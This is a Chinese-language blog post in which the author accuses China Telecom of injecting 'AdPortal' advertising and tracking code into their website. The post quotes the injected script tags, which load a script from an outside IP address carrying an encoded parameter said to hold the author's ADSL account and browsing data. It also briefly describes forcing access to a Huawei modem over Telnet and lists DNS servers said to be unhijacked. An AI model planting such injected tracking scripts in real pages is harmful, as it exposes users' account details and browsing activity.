繼DNS劫持後,流氓電信的AdPortal又橫空出世,終于明白為甚麼網站老被FRAME來FRAME去了。
小站被劫持後的慘狀:

<script type="mce-text/javascript" language="JavaScript">
    // <![CDATA[
    var s1 = "MDx4OTY5NaI8MTZ1MTw1ODt5OHdd";
    var s2 = "w6w6Ln84wnoqYS4qyr1=";
    // ]]>
    
</script>
<script type="mce-text/javascript" language="javascript" src="http://202.109.129.35/AdPortal/Default?param=ABx6JoZq9dJmBby6ZkynNozWQ0MTxnY7o9vWopPTt5ODtnwXNoxn4syWU0MDx4OTY5NaI8MTYnY7csx6NkZD9d&u=w6w6Ln84wnoqYS4qyr1="
data-mce-src="http://202.109.129.35/AdPortal/Default?param=ABx6JoZq9dJmBby6ZkynNozWQ0MTxnY7o9vWopPTt5ODtnwXNoxn4syWU0MDx4OTY5NaI8MTYnY7csx6NkZD9d&u=w6w6Ln84wnoqYS4qyr1=">
</script>
<img class="mceItemMedia mceItemIframe" src="/usr/plugins/TinyMCE/tiny_mce/themes/advanced/img/trans.gif"
alt="" width="100%" height="100%" data-mce-json="{'video':{},'params':{'frameborder':'0','marginheight':'0','marginwidth':'0','src':'http://www.myvica.cn/?'}}"
data-mce-src="/usr/plugins/TinyMCE/tiny_mce/themes/advanced/img/trans.gif">

其中IP為江西地區獨享,暫行解決方案為封殺此IP位址,PPPOE連接與本地連接,全部替換為OPENDNS(本人連Modem的DNS也強行設定了…) OPENDNS也有點問題,大傢可以在文末DNS中另行測試

如果諸位看倌遇上網站沒有標題,內容卻正常,同時伴有間歇性跳出“電信防毒牆”廣告,那麼小弟在此先恭喜了,您也獲得瞭中國電信為線友量身定製的上網體驗。

投訴第一回合,電信工作人員不打自招說出了廣告推送,證實設想的可能,不過苦于證據頗少,不能硬說根據IP就說是電信所為。
工作人員也給了個很無賴的答復,說我沒有看到廣告,不受理。
真想跟這位無賴的MM說,如果妳被監視著,妳也會如此泰然處之麼?
電信流氓.JPG

12月1日,上Telnet強行Crack掉華為的破Modem,設定好網域、NAT rule,總算把AdPortal解決掉了。
分析過被FRAME的程式碼,是利用xBase64 Encode,那串東西裡頭包括瞭本人的ADSL帳號及訪問網頁信息,暫無廣告。
這年頭,真是動詞化的時代~

未被劫持的dns伺服器

北京移動211.136.17.107
北京網通202.106.148.1

台灣未被劫持的dns
168.95.1.1(dns.hinet.net)
168.95.192.1(hntp1.hinet.net)
168.95.192.2(hntp3.hinet.net)
205.252.144.228 香港

有線寬頻 i-Cable DNS
61.10.0.130
61.10.1.130
香港寬頻 Hong Kong BroadBand Network DNS
203.80.96.10
HKNet 寬頻 DNS
202.67.240.222
202.67.240.221
和記環球電訊 DNS
202.45.84.59
Pacific SuperNet
202.14.67.4
202.14.67.14
CyberExpress
202.60.252.8